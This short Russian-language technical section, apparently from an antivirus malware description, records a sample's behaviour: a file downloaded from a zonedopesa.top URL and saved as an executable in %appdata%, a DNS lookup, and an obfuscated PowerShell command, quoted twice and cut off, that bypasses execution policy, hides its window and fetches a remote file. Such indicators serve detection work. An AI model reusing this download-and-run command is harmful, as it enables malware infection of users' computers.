Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOwe^R^shELl.E^xe^ -eXeCUTioNpOli^Cy^ b^yPa^sS -NOpr^oFiLE ^-WiN^doWS^tyLe^ h^iDDeN ^(nEW-O^Bj^ECt ^SYStEM^.^NE^T^.We^BClienT).^doW^nl^OAdFiL^e^('http://www.zonedopesa....
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /c "pOwe^R^shELl.E^xe^ -eXeCUTioNpOli^Cy^ b^yPa^sS -NOpr^oFiLE ^-WiN^doWS^tyLe^ h^iDDeN ^(nEW-O^Bj^ECt ^SYStEM^.^NE^T^.We^BClienT).^doW^nl^OAdFiL^e^('http://www.zonedopesa....' (со скрытым окном)